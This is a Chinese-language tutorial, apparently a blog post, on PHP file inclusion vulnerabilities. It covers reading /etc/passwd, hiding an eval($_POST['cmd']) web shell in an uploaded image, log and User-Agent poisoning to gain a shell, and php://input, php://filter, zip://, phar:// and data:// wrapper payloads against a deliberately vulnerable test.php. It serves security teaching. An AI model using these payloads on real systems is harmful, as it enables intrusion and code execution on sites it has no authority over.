一、漏洞描述
程序在引用文件的时,引用的文件名,用户可控的情况,传入的文件名没有经过合理的校验或校验不严,从而操作了预想之外的文件,就有
可能导致文件泄漏和恶意的代码注入。
程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这种文件调用的过程一般
被称为文件包含。
程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用
一个恶意文件,造成文件包含漏洞。
几乎所有脚本语言都会提供文件包含的功能,但文件包含漏洞在 PHP Web Application 中居多, 而在 JSP、ASP、ASP.NET 程序中却
非常少,甚至没有,这是有些语言设计的弊端。在 PHP 中经常出现包含漏洞,但这并不意味这其他语言不存在。
二、常见文件包含函数
include():执行到 include 时才包含文件,找不到被包含文件时只会产生警告,脚本将继续执行;
require():只要程序一运行就包含文件,找不到被包含的文件时会产生致命错误,并停止脚本;
include_once()和 require_once():若文件中代码已被包含,则不会再次包含。
三、代码分析
$_GET['filename'] 接收客户端传的参数,其中没有任何过滤带入到 include 函数中,include 包含这个文件,引入到当前文件中,
因此会造成文件包含漏洞。
四、利用方法
文件包含漏洞,需要引入上传的文件到网站目录,或服务器内部的文件,而且权限是可读,才能引入进来,或远程包含进来,但是需要条件。
五、本地文件包含
本地包含文件,被包含的文件在本地。
1、文件包含/etc/passwd
如果存在漏洞,文件又存在的时候,不是 php文件会被读取显示在页面中。/etc/passwd文件是 linux 里的敏感信息,文件里存有
linux用户的配置信息。
2、文件包含图片
寻找网站上传点,把 php 恶意代码文件改成 jpg 上传到网站上,本地包含引入恶意代码,当文件被引入后,代码就被执行。
<?php phpinfo();eval($_POST['cmd']);?> 保存为 shell.jpg
上传图片格式到网站,再用文件包含漏洞引入图片,成功执行代码。
3、包含日志文件 getshell
3.1 原理分析
中间件例如 iis 、apache、nginx 这些 web 中间件,都会记录访问日志,如果访问日志中或错误日志中,存在有 php 代码,也可以
引入到文件包含中。如果日志有 php 恶意代码,也可导致 getshell。
使用 burpsuite 访问GET ,填写 <?php phpinfo();eval($_POST[cmd]);?>
linux 日志文件权限默认是 root,而php 的权限是 www-data,一般情况下都是读取不了,如果是 windows 环境下,权限是允许的。
linux 默认的 apache 日志文件路径
访问日志:
/var/log/apache2/access.log
错误日志:
/var/log/apache2/error.log
把文件日志包含进来即可。
3.2 搭建测试环境
<?php
include $_GET['file'];
?>
3.3 抓包测试
3.4 包含access.log
4、包含环境变量 getshell
修改 User-Agen 填写 php 代码
/proc/self/environ 这个文件里保存了系统的一些变量
如果权限足够,包含这个文件就能 getshell
六、伪协议
1、介绍
1.1 常见协议
file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流(I/O streams)
zlib:// — 压缩流
data:// — 数据(RFC 2397)
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流
1.2 php.ini 参数设置
在 php.ini 里有两个重要的参数:allow_url_fopen、allow_url_include。
allow_url_fopen:默认值是 ON。允许 url 里的封装协议访问文件;
allow_url_include:默认值是 OFF。不允许包含 url 里的封装协议包含文件;
1.3 各协议的利用条件和方法
2、php://input
php://input 可以访问请求的原始数据的只读流,将 post 请求的数据当作 php 代码执行。当传入的参数作为文件名打
开时,可以将参数设为 php://input,同时 post 想设置的文件内容,php 执行时会将 post 内容当作文件内容。
注:当 enctype="multipart/form-data",php://input 是无效的。
php.ini 条件是 allow_url_fopen =ON、allow_url_include=ON
设置请求为 post 请求,在正文输入php 代码<?php phpinfo();?>提交即可允许。
2.1 test.php
<?php
include $_GET['file'];
?>
2.2 修改参数,并send
3、file:// 访问本地文件
3.1 file:///etc/passwd
在本地包含漏洞里可以使用 file 协议,使用 file 协议可以读取本地文件。
file:///etc/passwd
3.2 读取相对路径文件
http://192.168.1.50/test.php?file=./01/php.ini
4、php://
4.1 介绍
php:// 用于访问各个输入/输出流(I/O streams),经常使用的是 php://filter 和 php://input
php://filter 用于读取源码。
php://input 用于执行 php 代码。
php://filter 参数详解
可用的过滤器列表(4 类)
4.2 使用协议读取文件源码
php://filter/read=convert.base64-encode/resource=/etc/passwd
读取文件后再进行 base64 解码。
5、phar://、zip://、bzip2://、zlib://
用于读取压缩文件,zip:// 、 bzip2:// 、 zlib:// 均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需
要指定后缀名,可修改为任意后缀:jpg png gif xxx 等等。
1、zip://[压缩文件绝对路径]%23[压缩文件内的子文件名](#编码为%23)
http://127.0.0.1/include.php?file=zip://E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.tx
t
5.1 处理压缩包文件
5.2 zip://
test.php
<?php
include $_GET['file'];
?>
http://192.168.1.48/test.php?file=zip://C:\phpStudy\WWW\1.zip%231.jpg
5.3 compress.bzip2://file.bz2
http://127.0.0.1/include.php?file=compress.bzip2://D:/soft/phpStudy/WWW/file.jpg
http://127.0.0.1/include.php?file=compress.bzip2://./file.jpg
5.4 compress.bzip2://file.bz2
http://127.0.0.1/include.php?file=compress.zlib://D:/soft/phpStudy/WWW/file.jpg
http://127.0.0.1/include.php?file=compress.zlib://./file.jpg
5.5 phar://
http://127.0.0.1/include.php?file=phar://E:/phpStudy/PHPTutorial/WWW/phpinfo.zip/phpinfo.txt
6、data://
1、data://text/plain,
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
2、data://text/plain;base64,
http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
478
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
